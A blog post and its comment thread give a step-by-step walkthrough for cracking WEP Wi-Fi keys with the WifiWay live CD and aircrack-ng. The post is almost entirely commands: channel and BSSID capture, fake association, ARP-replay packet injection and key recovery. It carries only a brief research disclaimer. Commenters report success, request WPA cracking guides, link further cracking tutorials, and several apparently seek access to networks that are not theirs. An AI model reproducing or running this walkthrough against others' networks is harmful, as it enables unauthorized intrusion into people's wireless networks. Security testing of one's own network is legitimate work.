Based on a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I never actually did it myself.
Note: This is only for researching, learning, and security checking purposes. This shouldn't be used to crack networks owned by other people. To attack and to vulnerate networks (or other resources) is bad, and illegal.
Doing some research, I found that my Sony Vaio VGN N350FE wireless card (an Intel 3945ABG), didn't allow certain things from linux, among them one necessary to demonstrate this vulnerability.
If you read my previous posts, you'll see that this is not the first problem I find with hardware.
Also it isn't the first I find a solution for :-)
I found a howto at http://foro.seguridadwireless.net/index.php?topic=3227.0 that I used as a base.
Next, the steps I followed to crack WEP.
We need a linux distribution availabe at http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. We download the CD image and we burn it.
We boot the notebook with WifiWay (it must be able to boot from optical drives).
Once started, we open the X:
startx
We set the channel of the AP (Access Point) in the NIC.
echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel
We get the BSSID, the channel and the ESSID.
airodump-ng rtap0
We finish the execution with CONTROL-C, and we set the BSSID (an HEX number with 6 positions) in the NIC.
echo 'AP_BSSID' > /sys/class/net/wifi0/device/bssid
Once we do this, we start capturing.
airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0
We open a new window and we set speed at 2 mbps:
echo '2' > /sys/class/net/wifi0/device/rate
We activate the nic.
ifconfig wifi0 up
We look for our MAC address, it's the first 12 numbers stated in HWaddr
ifconfig
We initiate an association with the AP.
aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0
We open another terminal and we start injecting traffic:.
aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0
This should incremente the number of data in the capture window (it takes a while before it starts incrementing).
When we have over 100.000, we may extract the key by executing:
aircrack-ptw CAPTURE_FILE.cap
This should give us the key in hex format.
I hope this is useful to you.
Technorati tags: Vaio, Sony Vaio, WEP, WiFi, Wireless, Security, Crack
Cheers!
27 comments:
Hi there! I have a que: your OS is windoze and you actually dine that under linux distributive, do I got it right?
hi!
my OS is not windows: it is Ubuntu.
you may have windows, or other Linux distros, it doesn't matter because you'll use the live cd, and it will load a Linux distro with all the tools needed.
I hope this helps. Tell me how it goes.
Sebastian
Is this a no client attack? What about deathu attacks?
I have been tring ipwraw on my fiesty system for two days with little progess. Cant wait to try wifi and your howto
I ran the live cd of wifiway 0.8 and your how to, it worked perfect!!
Would you consider doing a similar HOWTO for WPA?
hi vaio vgn owner
I'm glad to hear that you were able to successfully run the howto!
I am considering writing a howto for cracking wpa, but till now I hadn't had time.
If you want me to notify you when I write it, leave me a message with your email (I won't publish it).
Cheers mate!
hi sebastian,
i've tried your howto guide with wifiway 08 on my sony vaio with OS Vista and... it doesnt works
if I type airodump-ng rtap0 the answer is: rtap0 is not a newtwork interface
could you help me?
thanks
mitso
Hi Mitso
What Vaio model are you using? I'm using a VGN-N350FE.
I'll need more info from your system:
Please send me the results of:
lspci
ifconfig
dmesg
We'll try to figure out what's going on.
Cheers mate!
weird thing happens for me, i'm using wifiway .8 and i can do everything when no errors. i'll usually go:
load (which loads ipwraw) and then your steps, but when aireplay is running, its gets no ARG requests, which i assume means injection isn't working. (i have a ipw3945 if that helps)
thanks,
iqbal
hey,
I'm using wifiway .8 and ipw3945
I've tried using the 'load' command/script (loads ipwraw drivers i believe)
then i use your steps
everything runs fine, except when aireplay is running, i get no ARG's whatsoever. Any ideas?
Thanks
Hi Iqbal,
I don't know the 'load' command you are mentioning.
Did you try to follow this howto step by step from scratch?
This howto is meant to work with the ipw3945, so you should have no problems.
Please tell me how it goes.
Good luck!
I figured it out.
On the newest wifiway (.8) you can just type 'airoway.sh' and its pretty much automated. as far as i know, that only works for ipw3945, i think there is something called airoscript for other cards
hi sebastian, pls can you help me out i got no wi-fi on my computer pls can you help me to crack wep keys on my psp pls!!!pls email me on da504@hotmail.com
Hi sebstain,
Thansk and it worked, simple and easy.
I did exactly what your walkthrough said and worked great and i got a HP Intel Centrino Duo IPW3945 Chipset. Took me a little while where i was a virgin at the Linux OS but other than that worked great thanks man..
Hi,
I'm having the same problem as iqbal, that is I get no ARP requests, so no packet to replay and consequently no packet injection. The association works fine, though. Any ideas?
I followed your how-to to the letter, using version 0.8 and ipw3945 (Vaio machine).
Thanks,
Jim
Hi Jim,
One question: are you trying to break your own network? or someone else's?
If it is some else's network, it could be they are filtering by mac-address.
Please note this article is for research, learning, and security checks only. I don't encourage breaking into other people's resources.
hi, i've found a guide for how to use the automated airoway.sh (you type it in the terminal) at http://ctorrecillas.blogspot.com/2007/11/wep-decryption.html . might be something to check out to help you out. it's force wifiway 0.8
Hi,
It is my own network, so I already know everything (WEP 128-bit, no MAC filtering). I am just doing this for fun.
When I connect a client to my AP (from another laptop) after having started the attack, everything works fine. I only get this problem when I try it without having a "real" client.
Is there a way to do it without connecting a client?
Thanks,
Jim
Hi im a fresh linux user but with help of you i managed to get password to wifi network. Unfortunetly i have no idea how to use this password now to connect to network. Please help me out. Let me know what kinde of commend i need to run. i got wifiway 0.8, intel pro 3945 --> wifi0. thanks for help
I tried this on Sony Vaio vgn-tx2hp.
airodump-ng rtap0 works fine.
But I can't run for example echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel
simply because there is no wifi0 folder on my disk.
Is this because Sony Vaio NIC doesnt support this?
Maybe I should plug PCMCIA WiFi card?
I'm new to this and any help appreciated
Dimon
This howto whas written using Wifiway 0.6
I cannot guarantee it will work with other versions!
Please try to download an use wifiway 0.6
Cheers!
This works GREAT with my Dell Inspirion 6400.
THANKS!
Now I just need to figure out how to crack WPA with this thing...
I used wifiway 0.8 with the airoway.sh script and it worked with ipw3945. Thanks!
hi man i have vaio vgn fj57gp with intel(R) PRO/Wireless 2200BG card. the method u mentioned here would it work for this card?? as far as i came toknow frommy research over the net that this card has jus one mode:(
awesome tutorial. just one thing to add..
when i was trying my luck, i had extremely frustrating time with getting the network adapter into the monitor mode. i have the Intel PRO Wireless 3945ABG card too, and neither madwifi or mac802 worked for me. but eventually i discovered that the ipwraw-ng driver worked fine with my card. the two pages below were of great help to me if anyone is interested
How to crack WEP with Intel PRO/Wireless 3945ABG
http://www.maxi-pedia.com/how+to+crack+WEP+with+intel+PRO+wireless+3945ABG
How to crack WEP encryption (wifi security)
http://www.maxi-pedia.com/crack+WEP
find tutorial cracking wireless use windows+vmware+usb wifi here >>TUTORIAL CRACK WIRELESS USE WINDOWS<<
Tthanks dude,today i just cracking wep in windows.take a few minute for get the ket.very2 easy technique.i use usb wifi for alternative because my built in broadcom problem to inject.i just find tutorial at http://wireless-security-system.blogspot.com
Post a Comment